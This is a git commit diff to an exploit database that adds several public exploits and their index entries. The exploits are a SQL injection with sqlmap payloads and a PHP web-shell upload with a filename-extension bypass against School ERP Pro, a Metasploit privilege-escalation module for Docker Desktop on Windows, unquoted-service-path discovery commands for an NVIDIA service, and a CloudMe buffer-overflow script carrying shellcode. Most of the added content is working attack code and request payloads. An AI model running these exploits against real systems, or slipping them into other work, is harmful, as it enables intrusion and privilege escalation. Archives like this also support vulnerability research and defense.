DB: 2020-04-29
8 changes to exploits/shellcodes Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit) NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path CloudMe 1.11.2 - Buffer Overflow (PoC) School ERP Pro 1.0 - 'es_messagesid' SQL Injection School ERP Pro 1.0 - Remote Code Execution
This commit is contained in:
parent
b1e1bfd776
commit
0f5a9de36d
7 changed files with 346 additions and 2 deletions
|
@ -4,7 +4,7 @@
|
|||
# Vendor Homepage: https://www.valvesoftware.com/en/
|
||||
# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
|
||||
# Tested on: MacOS 15.3
|
||||
# CVE : N/A
|
||||
# CVE : CVE-2020-12242
|
||||
|
||||
import os, random, sys
|
||||
banner = """
|
44
exploits/php/webapps/48390.txt
Normal file
44
exploits/php/webapps/48390.txt
Normal file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
|
||||
# Date: 2020-04-28
|
||||
# Author: Besim ALTINOK
|
||||
# Vendor Homepage: http://arox.in
|
||||
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
|
||||
# Version: latest version
|
||||
# Tested on: Xampp
|
||||
# Credit: İsmail BOZKURT
|
||||
|
||||
SQL Injection Detail
|
||||
--------------------------------
|
||||
*# Vulnerable parameter: es_messagesid*
|
||||
*# Vulnerable code:*
|
||||
|
||||
if($action=="fullmessage_sent"){
|
||||
$msg_qry ="SELECT * FROM es_messages WHERE
|
||||
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and
|
||||
es_messagesid=".*$es_messagesid;*
|
||||
$details_message=$db->getrow($msg_qry);
|
||||
}
|
||||
?>
|
||||
|
||||
*Here is the SQLmap output:*
|
||||
*----------------------------------------*
|
||||
|
||||
GET parameter '*es_messagesid*' is vulnerable.
|
||||
sqlmap identified the following injection point(s):
|
||||
---
|
||||
Parameter: es_messagesid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
|
||||
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
|
||||
6369=6369
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (random number) - 12 columns
|
||||
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
|
||||
SELECT
|
||||
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194--
|
||||
-
|
||||
---
|
||||
[01:09:41] [INFO] testing MySQL
|
||||
[01:09:42] [INFO] confirming MySQL
|
||||
[01:09:44] [INFO] the back-end DBMS is MySQL
|
103
exploits/php/webapps/48392.txt
Normal file
103
exploits/php/webapps/48392.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
|
||||
# Date: 2020-04-28
|
||||
# Author: Besim ALTINOK
|
||||
# Vendor Homepage: http://arox.in
|
||||
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
|
||||
# Version: latest version
|
||||
# Tested on: Xampp
|
||||
# Credit: İsmail BOZKURT
|
||||
|
||||
Description
|
||||
-------------------------------------------
|
||||
A student can send a message to the admin. Additionally, with this method,
|
||||
the student can upload a PHP file to the system and run code in the system.
|
||||
|
||||
------------------------------------
|
||||
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
|
||||
- Student user can send message to admin with the attachment
|
||||
------------------------------------
|
||||
$image_file = basename($_FILES['newimage']['name'][$i]);
|
||||
$ext=explode(".",$_FILES['newimage']['name'][$i]);
|
||||
$str=date("mdY_hms");
|
||||
//$t=rand(1, 15);
|
||||
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
|
||||
$updir = "images/messagedoc/";
|
||||
$dest_path = $updir.$new_thumbname;
|
||||
$up_images[$i] = $dest_path;
|
||||
$srcfile = $_FILES['newimage']['tmp_name'][$i];
|
||||
@move_uploaded_file($srcfile, $dest_path);
|
||||
$ins_arr_prod_images = array(
|
||||
'`es_messagesid`' => $id,
|
||||
'`message_doc`' => $new_thumbname
|
||||
);
|
||||
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);
|
||||
|
||||
---------------------------------------------------
|
||||
*PoC of the Remote Code Execution*
|
||||
---------------------------------------------------
|
||||
|
||||
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 ***************************
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-GB,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer:
|
||||
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------2104557667975595321153031663
|
||||
Content-Length: 718
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------2104557667975595321153031663
|
||||
Content-Disposition: form-data; name="subject"
|
||||
|
||||
DEDED
|
||||
-----------------------------2104557667975595321153031663
|
||||
Content-Disposition: form-data; name="message"
|
||||
|
||||
<p>DEDED</p>
|
||||
-----------------------------2104557667975595321153031663
|
||||
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
|
||||
Content-Type: text/php
|
||||
|
||||
<?php phpinfo(); ?>
|
||||
|
||||
-----------------------------2104557667975595321153031663
|
||||
Content-Disposition: form-data; name="filecount[]"
|
||||
|
||||
1
|
||||
-----------------------------2104557667975595321153031663
|
||||
Content-Disposition: form-data; name="submit_staff"
|
||||
|
||||
Send
|
||||
-----------------------------2104557667975595321153031663--
|
||||
|
||||
|
||||
------------------------------------
|
||||
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
|
||||
- Admin user can update user profile photo
|
||||
------------------------------------
|
||||
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
|
||||
$ext = explode(".",$_FILES['pre_image']['name']);
|
||||
$str = date("mdY_hms");
|
||||
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
|
||||
$updir = "images/student_photos/";
|
||||
$uppath = $updir.$new_thumbname;
|
||||
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
|
||||
$file = $new_thumbname;
|
||||
|
||||
------------------------------------
|
||||
Bypass Technique:
|
||||
------------------------------------
|
||||
|
||||
$_FILES['pre_image']['name']; --- > shell.php.png
|
||||
$ext = explode(".",$_FILES['pre_image']['name']);
|
||||
---
|
||||
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
|
||||
$ext[0] --> shell
|
||||
$ext[1] --> php
|
||||
lastfilename --> st_date_shell.php
|
108
exploits/windows/local/48388.rb
Executable file
108
exploits/windows/local/48388.rb
Executable file
|
@ -0,0 +1,108 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::Runas
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This exploit leverages a vulnerability in docker desktop
|
||||
community editions prior to 2.1.0.1 where an attacker can write
|
||||
a payload to a lower-privileged area to be executed
|
||||
automatically by the docker user at login.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Morgan Roman', # discovery
|
||||
'bwatters-r7', # metasploit module
|
||||
],
|
||||
'Platform' => ['win'],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'Targets' => [[ 'Automatic', {} ]],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => {
|
||||
'WfsDelay' => 15
|
||||
},
|
||||
'DisclosureDate' => '2019-07-05',
|
||||
'Notes' =>
|
||||
{
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK ]
|
||||
},
|
||||
'References' => [
|
||||
['CVE', '2019-15752'],
|
||||
['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
|
||||
]
|
||||
)
|
||||
)
|
||||
register_options(
|
||||
[OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
|
||||
)
|
||||
end
|
||||
|
||||
def docker_version
|
||||
output = cmd_exec('cmd.exe', '/c docker -v')
|
||||
vprint_status(output)
|
||||
version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0]
|
||||
Gem::Version.new(version_string.split('.').map(&:to_i).join('.'))
|
||||
end
|
||||
|
||||
def check
|
||||
if docker_version <= Gem::Version.new('18.09.0')
|
||||
return CheckCode::Appears
|
||||
end
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
check_permissions!
|
||||
case get_uac_level
|
||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
|
||||
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||
fail_with(Failure::NotVulnerable,
|
||||
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
|
||||
when UAC_DEFAULT
|
||||
print_good('UAC is set to Default')
|
||||
print_good('BypassUAC can bypass this setting, continuing...')
|
||||
when UAC_NO_PROMPT
|
||||
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
|
||||
shell_execute_exe
|
||||
return
|
||||
end
|
||||
|
||||
# make payload
|
||||
docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
|
||||
fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
|
||||
payload_name = 'docker-credential-wincred.exe'
|
||||
payload_pathname = "#{docker_path}\\#{payload_name}"
|
||||
vprint_status('Making Payload')
|
||||
payload = generate_payload_exe
|
||||
|
||||
# upload Payload
|
||||
vprint_status("Uploading Payload to #{payload_pathname}")
|
||||
write_file(payload_pathname, payload)
|
||||
vprint_status('Payload Upload Complete')
|
||||
print_status('Waiting for user to attempt to login')
|
||||
end
|
||||
|
||||
def check_permissions!
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
|
||||
end
|
||||
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
|
||||
# Check if you are an admin
|
||||
# is_in_admin_group can be nil, true, or false
|
||||
end
|
||||
end
|
36
exploits/windows/local/48391.txt
Normal file
36
exploits/windows/local/48391.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
|
||||
# Discovery by: Roberto Piña
|
||||
# Discovery Date: 2020-04-27
|
||||
# Vendor Homepage: https://www.nvidia.com/es-la/
|
||||
# Software Link : https://www.nvidia.com/es-la/
|
||||
# Tested Version: 1.0.21
|
||||
# Vulnerability Type: Unquoted Service Path
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Step to discover Unquoted Service Path:
|
||||
|
||||
|
||||
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
|
||||
NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto
|
||||
|
||||
C:\>sc qc nvUpdatusService
|
||||
[SC] QueryServiceConfig CORRECTO
|
||||
|
||||
NOMBRE_SERVICIO: nvUpdatusService
|
||||
TIPO : 10 WIN32_OWN_PROCESS
|
||||
TIPO_INICIO : 2 AUTO_START (DELAYED)
|
||||
CONTROL_ERROR : 1 NORMAL
|
||||
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
|
||||
GRUPO_ORDEN_CARGA :
|
||||
ETIQUETA : 0
|
||||
NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
|
||||
DEPENDENCIAS :
|
||||
NOMBRE_INICIO_SERVICIO: .\UpdatusUser
|
||||
|
||||
C:\>
|
||||
|
||||
#Exploit:
|
||||
# A successful attempt would require the local user to be able to insert their code in the system root path
|
||||
# undetected by the OS or other security applications where it could potentially be executed during
|
||||
# application startup or reboot. If successful, the local user's code would execute with the elevated
|
||||
# privileges of the application.
|
48
exploits/windows/remote/48389.py
Executable file
48
exploits/windows/remote/48389.py
Executable file
|
@ -0,0 +1,48 @@
|
|||
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
|
||||
# Date: 2020-04-27
|
||||
# Exploit Author: Andy Bowden
|
||||
# Vendor Homepage: https://www.cloudme.com/en
|
||||
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
|
||||
# Version: CloudMe 1.11.2
|
||||
# Tested on: Windows 10 x86
|
||||
|
||||
#Instructions:
|
||||
# Start the CloudMe service and run the script.
|
||||
|
||||
import socket
|
||||
|
||||
target = "127.0.0.1"
|
||||
|
||||
padding1 = b"\x90" * 1052
|
||||
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
|
||||
NOPS = b"\x90" * 30
|
||||
|
||||
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
|
||||
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
|
||||
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
|
||||
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
|
||||
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
|
||||
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
|
||||
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
|
||||
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
|
||||
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
|
||||
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
|
||||
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
|
||||
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
|
||||
payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59"
|
||||
payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05"
|
||||
payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4"
|
||||
payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6"
|
||||
payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c"
|
||||
payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f"
|
||||
|
||||
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
|
||||
|
||||
buf = padding1 + EIP + NOPS + payload + overrun
|
||||
|
||||
try:
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((target,8888))
|
||||
s.send(buf)
|
||||
except Exception as e:
|
||||
print(sys.exc_value)
|
|
@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port
|
|||
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
|
||||
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
|
||||
48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
|
||||
48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
|
||||
48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
|
||||
48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
|
||||
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port
|
|||
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
|
||||
48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
|
||||
48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
|
||||
48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port
|
|||
48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
|
||||
48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
|
||||
48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
|
||||
48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
|
||||
48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue